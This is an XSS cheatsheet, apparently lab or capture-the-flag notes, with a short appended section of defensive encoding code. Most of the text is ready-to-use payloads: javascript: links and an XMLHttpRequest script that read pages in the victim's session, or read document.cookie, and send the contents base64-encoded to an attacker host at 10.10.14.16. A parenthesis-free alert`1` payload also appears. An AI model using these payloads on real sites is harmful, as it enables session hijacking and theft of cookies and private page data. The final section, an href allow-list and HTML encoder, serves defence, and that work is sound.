
XSS Cheatsheet

Perform GET/POST request on victim session

<a href='javascript: fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php") .then(response => response.text()) .then(data => fetch("http://10.10.14.16/", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "d=" + encodeURIComponent(btoa(unescape(encodeURIComponent(data)))) }));'>XSS test</a>
<script>
// Fetch the messages page in the victim's session and forward the response.
// The original snippet mixed two variable names (req / xhr), referenced an
// undefined reqListener and never closed the script tag; fixed here.
var req = new XMLHttpRequest();
var attacker = "http://10.10.14.16/cookie=";
req.onreadystatechange = function () {
    if (req.readyState == XMLHttpRequest.DONE) {
      fetch(attacker + "?" + encodeURI(btoa(req.responseText)));
    }
  };
req.open("get", "https://alert.htb/index.php?page=messages", true);
req.send();
</script>
<a href="javascript:fetch('http://10.10.14.16/?d='+encodeURIComponent(btoa(document.cookie)));">XSS test </a>

XSS without parentheses

alert`1`
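Defender-side counterpart to the two payload shapes above (javascript: hrefs and the parenthesis-free alert`1` call), added here and not part of the original cheatsheet: a scheme allow-list for href values plus context-aware HTML encoding, showing why stripping parentheses is not a fix. Assumes Node.js (built-in URL class); the function names are my own.

```javascript
// Added example, not from the original notes. Assumes Node.js (global URL).

// A blocklist that removes "(" and ")" does nothing against tagged-template
// calls such as alert`1`, so it is not a mitigation.
function stripParentheses(untrusted) {
  return String(untrusted).replace(/[()]/g, "");
}

// Encode untrusted text for an element body or a quoted attribute value.
// Backticks are encoded too so a template-literal call cannot survive
// inside an attribute that is later reflected into script context.
function encodeHtml(value) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "`": "&#x60;",
  };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Allow only http(s) or relative URLs in an href. javascript:, data:,
// vbscript: and anything unparsable become an inert "#".
function safeHref(untrusted) {
  // Browsers ignore leading whitespace/control characters before the scheme,
  // so strip them before classifying the URL.
  const cleaned = String(untrusted).replace(/^[\s\u0000-\u001f]+/, "");
  let parsed;
  try {
    // A base URL makes relative paths parse as https: instead of throwing.
    parsed = new URL(cleaned, "https://example.invalid/");
  } catch {
    return "#";
  }
  const ok = parsed.protocol === "http:" || parsed.protocol === "https:";
  return ok ? cleaned : "#";
}

// Build an <a> element from untrusted href and link text.
function renderLink(href, text) {
  return '<a href="' + encodeHtml(safeHref(href)) + '">' + encodeHtml(text) + "</a>";
}

// Constructed samples mirroring the cheatsheet's payloads:
console.log(stripParentheses("alert`1`"));            // unchanged, filter bypassed
console.log(renderLink("javascript:alert`1`", "XSS test"));
console.log(renderLink("/index.php?page=messages", "Messages"));
```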

Resources

  • https://portswigger.net/research/xss-without-parentheses-and-semi-colons
